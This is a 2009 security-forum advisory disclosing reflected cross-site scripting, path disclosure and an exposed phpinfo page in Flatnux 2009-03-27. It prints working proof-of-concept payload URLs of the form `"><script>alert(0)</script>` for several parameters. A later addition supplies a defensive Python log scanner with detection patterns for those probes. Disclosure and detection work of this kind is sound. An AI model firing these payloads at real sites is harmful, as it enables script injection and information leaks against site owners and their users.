InterN0T - Advisories: advisories found by members of InterN0T.

Posted 4th June 2009, 00:37 by MaXe (The Founder)
 
Join Date: Jun 2008
Location: Sweden - Ljusdal
Posts: 2,714
Blog Entries: 31
Rep Power: 10
Reputation: 146
MaXe will become a Token soonMaXe will become a Token soon
[InterN0T] Flatnux 2009-03-27 - XSS Vulnerabilities + More

Flatnux - Cross Site Scripting Vulnerabilities + More

Version Affected: "2009-03-27" (newest)

Info: See website for more information.

Credits: InterN0T

External Links:
http://www.flatnux.altervista.org/


-:: The Advisory ::-
Vulnerable Function / ID Calls:
mod, user, from, pk & dir (some have to be used in conjunction with other function calls)

Cross Site Scripting:
1. http://www.website.tld/flatnux/index.php?mod="><script>alert(0)</script> (anyone)
2. http://www.website.tld/flatnux/index.php?mod=login&op=profile&user="><script>alert(0)</script> (registered users only)
3. http://www.website.tld/flatnux/index.php?opindex=modcont&file=misc/motd.en.php&from="><script>alert(0)</script> (admin only)
4. http://www.website.tld/flatnux/controlcenter.php?mod=controlcenter&op=03_users/20_groups&opmod=insnew_groups&pk="><script>alert(0)</script> (admin only)

Path Disclosure:
http://www.website.tld/flatnux/index.php?mod=05_Foto&dir='

Information Disclosure:
http://www.website.tld/flatnux/sections/none_Control_Center/phpinfo.php

-:: Solution ::-
I didn't bother to find one, sorry.

Disclosure Information:
- Vulnerabilities found and confirmed between 1st and 3rd June 2009.
- Published at InterN0T the 3rd June 2009.
- Bugtraq contacted the 3rd June 2009.


All of the best,
MaXe
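As an added defensive example (not part of MaXe's post or of the Flatnux project), the following Python scans web-server access-log lines for requests that probe the issues listed in the advisory: markup or quote characters in the mod, user, from, pk and dir parameters, and requests for the exposed phpinfo.php page. The combined log format and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters the advisory lists as reflected without encoding in Flatnux 2009-03-27.
WATCHED_PARAMS = {"mod", "user", "from", "pk", "dir"}
# Page the advisory reports as an information disclosure (phpinfo output).
PHPINFO_PATH = "/sections/none_Control_Center/phpinfo.php"
# Markup or quote characters that have no business in these parameters; the
# advisory's path-disclosure URL shows a lone quote in dir= is already enough.
SUSPICIOUS = re.compile(r"""[<>"']""")
# Combined-format access log prefix (assumed format; only ip and target are used).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def inspect_request(target):
    """Return the reasons a request target looks like a probe for the advisory's issues."""
    reasons = []
    parts = urlsplit(target)
    if parts.path.endswith(PHPINFO_PATH):
        reasons.append("request for exposed phpinfo.php")
    # keep_blank_values keeps probes such as '?dir=' visible; parse_qs percent-decodes
    # once, the extra unquote() also catches double-encoded payloads.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            decoded = unquote(value)
            if SUSPICIOUS.search(decoded):
                reasons.append(f"markup/quote characters in parameter '{name}': {decoded[:40]!r}")
    return reasons

def scan_log(lines):
    """Return (client_ip, request_target, reasons) for each log line that matches a probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (reasons := inspect_request(m["target"])):
            findings.append((m["ip"], m["target"], reasons))
    return findings

# Constructed sample log lines (not real traffic); IPs come from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jun/2009:14:02:11 +0200] "GET /flatnux/index.php?mod=%22%3E%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 5120',
    '203.0.113.5 - - [03/Jun/2009:14:02:40 +0200] "GET /flatnux/index.php?mod=05_Foto&dir=%27 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [03/Jun/2009:14:03:01 +0200] "GET /flatnux/sections/none_Control_Center/phpinfo.php HTTP/1.1" 200 40210',
    '198.51.100.7 - - [03/Jun/2009:14:05:00 +0200] "GET /flatnux/index.php?mod=05_Foto&dir=summer HTTP/1.1" 200 3011',
]
```

Calling `scan_log(SAMPLE_LOG)` reports the three probing requests from 203.0.113.5 and ignores the benign `dir=summer` request; a real deployment would feed it the live access log instead of SAMPLE_LOG.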
LinkBack to this Thread: http://forum.intern0t.net/intern0t-advisories/1084-intern0t-flatnux-2009-03-27-cross-site-scripting-vulnerabilities-more.html